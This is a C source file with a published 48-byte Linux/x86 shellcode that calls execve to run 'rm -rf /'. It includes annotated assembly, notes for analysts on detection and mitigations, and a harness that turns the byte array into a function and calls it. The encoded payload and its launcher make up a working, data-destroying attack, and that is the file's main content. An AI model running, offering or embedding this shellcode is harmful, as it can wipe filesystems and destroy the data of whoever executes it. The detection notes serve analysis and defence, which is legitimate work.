/*
 * By Kris Katterjohn 8/31/2006
 *
 * 48 byte shellcode to execve("rm -rf /") for Linux/x86
 *
 * What it does: one execve system call that runs rm with the arguments
 * -r -f / and a NULL environment. The deletion runs with whatever
 * privileges the calling process already holds.
 *
 * Assembly source (NASM syntax), annotated:
 *
 *   section .text
 *
 *       global _start
 *
 *   _start:
 *
 *   ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL)
 *   ; NOTE(review): the bytes actually spell "/bin//rm" (see the two
 *   ; dword pushes below); the doubled slash pads the path to eight
 *   ; bytes so it fits two pushes.
 *
 *       push byte 11          ; eax = 11, the i386 execve syscall number
 *       pop eax
 *       xor esi, esi          ; esi = 0: string terminator and NULL
 *       push esi
 *       push byte 0x2f        ; "/"
 *       mov edi, esp          ; edi -> "/"
 *       push esi
 *       push word 0x662d      ; "-f"
 *       mov edx, esp          ; edx -> "-f"
 *       push esi
 *       push word 0x722d      ; "-r"
 *       mov ecx, esp          ; ecx -> "-r"
 *       push esi
 *       push 0x6d722f2f       ; "//rm"
 *       push 0x6e69622f       ; "/bin"
 *       mov ebx, esp          ; ebx -> "/bin//rm" (path argument)
 *       push esi              ; argv[4] = NULL
 *       push edi              ; argv[3] = "/"
 *       push edx              ; argv[2] = "-f"
 *       push ecx              ; argv[1] = "-r"
 *       push ebx              ; argv[0] = path
 *       mov ecx, esp          ; ecx = argv
 *       xor edx, edx          ; edx = envp = NULL
 *       int 0x80
 *
 * Notes for analysts and detection engineers:
 *
 *  - The encoded form contains no 0x00 byte. Every terminator comes from
 *    the zeroed esi register, so a content signature has to match the
 *    immediates ("/bin", "//rm", "-r", "-f") rather than a contiguous
 *    NUL-terminated "/bin/rm -rf /" string.
 *  - At run time the observable event is a process exec whose argv is
 *    { "/bin//rm", "-r", "-f", "/" } with an empty environment. Exec
 *    auditing that records argv (auditd EXECVE records, EDR process
 *    telemetry) sees this regardless of how the bytes were delivered.
 *  - Current GNU coreutils rm defaults to --preserve-root and refuses
 *    this argv. Do not assume the same of every rm implementation.
 *  - The harness below calls into an automatic (stack) array. Where the
 *    stack is mapped non-executable (NX/DEP), the call faults before any
 *    payload instruction runs.
 *  - int 0x80 with eax = 11 is the 32-bit Linux system-call convention;
 *    the listing targets i386 only, as the title says.
 */
main()
{
    /*
     * The payload bytes, kept in an automatic array exactly as published:
     * four adjacent literals, 48 bytes plus the implicit terminator.
     */
    char shellcode[] =
        "\x6a\x0b\x58\x31\xf6\x56\x6a\x2f\x89\xe7\x56\x66\x68\x2d\x66"
        "\x89\xe2\x56\x66\x68\x2d\x72\x89\xe1\x56\x68\x2f\x2f\x72\x6d"
        "\x68\x2f\x62\x69\x6e\x89\xe3\x56\x57\x52\x51\x53\x89\xe1\x31"
        "\xd2\xcd\x80";

    /*
     * Treat the array's address as a function taking unspecified
     * arguments. ISO C does not define conversion from an object pointer
     * to a function pointer; this relies on the platform's flat address
     * space.
     */
    void (*entry)() = (void (*)()) shellcode;

    entry();
}